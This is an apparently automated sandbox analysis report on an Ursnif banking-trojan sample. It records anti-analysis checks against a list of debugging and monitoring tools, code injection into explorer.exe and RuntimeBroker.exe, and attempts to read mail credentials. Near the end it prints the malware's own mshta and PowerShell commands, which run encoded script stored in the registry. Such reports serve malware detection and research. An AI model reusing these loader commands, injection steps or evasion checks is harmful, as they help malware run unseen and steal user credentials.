Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Show sources

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmp	Binary or memory string: FORTITRACER.EXEP>
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmp	Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmp	Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmp	Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmp	Binary or memory string: AUTORUNSC.EXE(=
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmp	Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmp	Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXE@A
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmp	Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmp	Binary or memory string: OLLYDBG.EXE@B
Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmp	Binary or memory string: SBIECTRL.EXE@
Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmp	Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmp	Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXE@:V
Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmp	Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXE
Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmp	Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmp	Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmp	Binary or memory string: SCKTOOL.EXE
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: DUMPCAP.EXE

Source: C:\Windows\System32\control.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3636			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5256			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\earmark.avchd	Jump to dropped file

Source: C:\Windows\System32\wscript.exe TID: 3120	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5784	Thread sleep time: -7378697629483816s >= -30000s			Jump to behavior

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local FullSizeInformation			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation			Jump to behavior

Source: C:\Windows\explorer.exe

Code function: 32_2_04DA37B8 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,

32_2_04DA37B8

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: wscript.exe, 00000000.00000002.687515024.0000014D600F0000.00000002.00000001.sdmp, explorer.exe, 00000020.00000002.1312946746.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.927198376.0000027D4F440000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000020.00000000.901398343.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: wscript.exe, 00000000.00000002.687515024.0000014D600F0000.00000002.00000001.sdmp, explorer.exe, 00000020.00000002.1312946746.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.927198376.0000027D4F440000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.687515024.0000014D600F0000.00000002.00000001.sdmp, explorer.exe, 00000020.00000002.1312946746.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.927198376.0000027D4F440000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.687515024.0000014D600F0000.00000002.00000001.sdmp, explorer.exe, 00000020.00000002.1312946746.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000000.927198376.0000027D4F440000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: earmark.avchd.0.dr

Jump to dropped file

Allocates memory in foreign processes

Show sources

Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B4FAC40000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C300000 protect: page execute and read and write

Changes memory attributes in foreign processes to executable or writable

Show sources

Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: BD4F1580	Jump to behavior
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 9F6000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 24C0000 value: 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: 40	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3424	Jump to behavior
Source: C:\Windows\explorer.exe	Thread register set: target process: 3656
Source: C:\Windows\explorer.exe	Thread register set: target process: 4268
Source: C:\Windows\explorer.exe	Thread register set: target process: 4772
Source: C:\Windows\explorer.exe	Thread register set: target process: 5816
Source: C:\Windows\explorer.exe	Thread register set: target process: 6340

Writes to foreign memory regions

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 9F6000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 24C0000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFF1000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7386883000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B4FAC40000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD2179000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C300000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD10C.tmp' 'c:\Users\user\AppData\Local\Temp\xuilsqrn\CSCD8A4030A3E546C3B2CF916F018EDC0.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE214.tmp' 'c:\Users\user\AppData\Local\Temp\iaweong2\CSC9F4D0947F3074F27AD7E2B0574F6C6A.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'

Source: explorer.exe, 00000020.00000000.893126170.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000020.00000000.893860754.0000000001080000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000020.00000000.893860754.0000000001080000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000020.00000000.893860754.0000000001080000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000020.00000000.893860754.0000000001080000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmp	Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmp	Binary or memory string: autoruns.exe
Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmp	Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmp	Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.882736166.0000000001040000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719373287.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719415680.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.817982563.00000000052EF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.718993009.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719443986.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1294500412.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1296954401.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719331728.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1311153355.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719519037.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.923726669.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719248205.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.762861604.00000000053ED000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719501128.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719850328.00000000054EB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1296813994.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5976, type: MEMORY

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.882736166.0000000001040000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719373287.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719415680.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.817982563.00000000052EF000.00000004.00000040.sdmp, type: MEMORY
